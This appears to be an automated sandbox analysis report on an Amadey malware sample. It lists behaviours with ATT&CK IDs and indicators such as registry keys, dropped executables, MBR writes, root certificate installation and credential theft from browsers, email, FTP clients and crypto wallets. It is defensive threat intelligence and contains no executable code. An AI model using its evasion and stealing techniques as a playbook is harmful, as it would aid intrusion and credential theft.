amadey | 432adaeea45ba832a1df15b4d615d82967e4f0dc79371dbfafc1df922978f26e

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Fe36XBk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	loqVSeJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Fe36XBk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	35f030b7d73472a67a55161a98d37678.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	012Bdpb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7fOMOTQ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Bjkm5hE.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3472	powershell.exe
1924	powershell.exe
4764	powershell.exe
2300	powershell.exe
4300	powershell.exe
4896	powershell.exe
3420	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe
5	2700	skotes.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
1632	chrome.exe
1920	chrome.exe
1968	chrome.exe
3540	chrome.exe
532	chrome.exe

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0005000000019617-514.dat	net_reactor
behavioral1/memory/876-524-0x0000000000FC0000-0x000000000107E000-memory.dmp	net_reactor
behavioral1/files/0x000800000001a4e4-1441.dat	net_reactor
behavioral1/memory/2456-1449-0x0000000000E90000-0x0000000000F6C000-memory.dmp	net_reactor
behavioral1/memory/3312-2974-0x00000000002D0000-0x00000000003AC000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	35f030b7d73472a67a55161a98d37678.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	012Bdpb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	loqVSeJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	loqVSeJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7fOMOTQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7fOMOTQ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	35f030b7d73472a67a55161a98d37678.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Fe36XBk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	012Bdpb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Fe36XBk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UN8QxIq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bjkm5hE.exe

Executes dropped EXE 28 IoCs

pid	Process
2700	skotes.exe
1144	13Z5sqy.exe
1808	jonbDes.exe
2372	tYrnx75.exe
2324	Macromedia.com
876	up7d8Ym.exe
2308	up7d8Ym.exe
800	012Bdpb.exe
1316	7fOMOTQ.exe
3024	Bjkm5hE.exe
1984	Fe36XBk.exe
1000	loqVSeJ.exe
1252	kUHbhqh.exe
3680	5bzo1pz.exe
2456	cABT5qY.exe
2136	cABT5qY.exe
2908	Ryu8yUx.exe
2872	Ryu8yUx.exe
2036	Ryu8yUx.exe
3240	UN8QxIq.exe
3544	ViGgA8C.exe
2076	WveK4j1.exe
1192	Ryu8yUx.exe
2760	Ryu8yUx.exe
1924	UN8QxIq.exe
2180	kUHbhqh.exe
3472	Bjkm5hE.exe
4008	Fe36XBk.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	Bjkm5hE.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	loqVSeJ.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	ViGgA8C.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	Bjkm5hE.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	7fOMOTQ.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	012Bdpb.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	Fe36XBk.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	Fe36XBk.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	35f030b7d73472a67a55161a98d37678.exe

Loads dropped DLL 62 IoCs

pid	Process
592	35f030b7d73472a67a55161a98d37678.exe
592	35f030b7d73472a67a55161a98d37678.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2372	tYrnx75.exe
2492	cmd.exe
2700	skotes.exe
876	up7d8Ym.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
3812	MsiExec.exe
3924	rundll32.exe
3924	rundll32.exe
3924	rundll32.exe
3924	rundll32.exe
3924	rundll32.exe
3924	rundll32.exe
3924	rundll32.exe
2700	skotes.exe
2456	cABT5qY.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
336	WerFault.exe
2700	skotes.exe
2908	Ryu8yUx.exe
2908	Ryu8yUx.exe
2364	WerFault.exe
2364	WerFault.exe
2364	WerFault.exe
2364	WerFault.exe
2364	WerFault.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
1192	Ryu8yUx.exe
3048	WerFault.exe
3048	WerFault.exe
3048	WerFault.exe
3048	WerFault.exe
3048	WerFault.exe
2700	skotes.exe
2700	skotes.exe
2700	skotes.exe
3964	MsiExec.exe
2700	skotes.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4092	powercfg.exe
892	powercfg.exe
880	powercfg.exe
4088	powercfg.exe
3800	powercfg.exe
4004	powercfg.exe
1512	powercfg.exe
2300	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	012Bdpb.exe
File opened for modification	\??\PHYSICALDRIVE0	Fe36XBk.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	UN8QxIq.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2824	tasklist.exe
1824	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
592	35f030b7d73472a67a55161a98d37678.exe
2700	skotes.exe
800	012Bdpb.exe
1316	7fOMOTQ.exe
3024	Bjkm5hE.exe
1984	Fe36XBk.exe
1000	loqVSeJ.exe
3544	ViGgA8C.exe
3472	Bjkm5hE.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 876 set thread context of 2308	876	up7d8Ym.exe	53
PID 1144 set thread context of 1664	1144	13Z5sqy.exe	61
PID 2456 set thread context of 2136	2456	cABT5qY.exe	91
PID 2908 set thread context of 2036	2908	Ryu8yUx.exe	97
PID 1192 set thread context of 2760	1192	Ryu8yUx.exe	110
PID 3240 set thread context of 2884	3240	UN8QxIq.exe	149

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\f78aad0.msi	msiexec.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Installer\MSIB50E.tmp	msiexec.exe
File opened for modification	C:\Windows\ContainsBefore	tYrnx75.exe
File opened for modification	C:\Windows\AttacksContacted	tYrnx75.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Installer\f78aad0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Tasks\skotes.job	35f030b7d73472a67a55161a98d37678.exe
File opened for modification	C:\Windows\TokenDetroit	tYrnx75.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIB4FD.tmp	msiexec.exe
File opened for modification	C:\Windows\SchedulesAb	tYrnx75.exe
File created	C:\Windows\Installer\f78aad1.ipi	msiexec.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1220	sc.exe
3140	sc.exe
4488	sc.exe
3568	sc.exe
4512	sc.exe
4816	sc.exe
4448	sc.exe
3520	sc.exe
2256	sc.exe
2252	sc.exe
3800	sc.exe
4020	sc.exe
4656	sc.exe
4956	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
336	876	WerFault.exe	52
336	2456	WerFault.exe	86
2364	2908	WerFault.exe	95
3048	1192	WerFault.exe	107
4344	4204	WerFault.exe	169
4516	4008	WerFault.exe	144
4532	3312	WerFault.exe	200

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	35f030b7d73472a67a55161a98d37678.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5bzo1pz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tYrnx75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7fOMOTQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Macromedia.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cABT5qY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	13Z5sqy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ryu8yUx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	loqVSeJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cABT5qY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jonbDes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	up7d8Ym.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	up7d8Ym.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Bjkm5hE.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3040	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

defense_evasion spyware trojan

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Bjkm5hE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2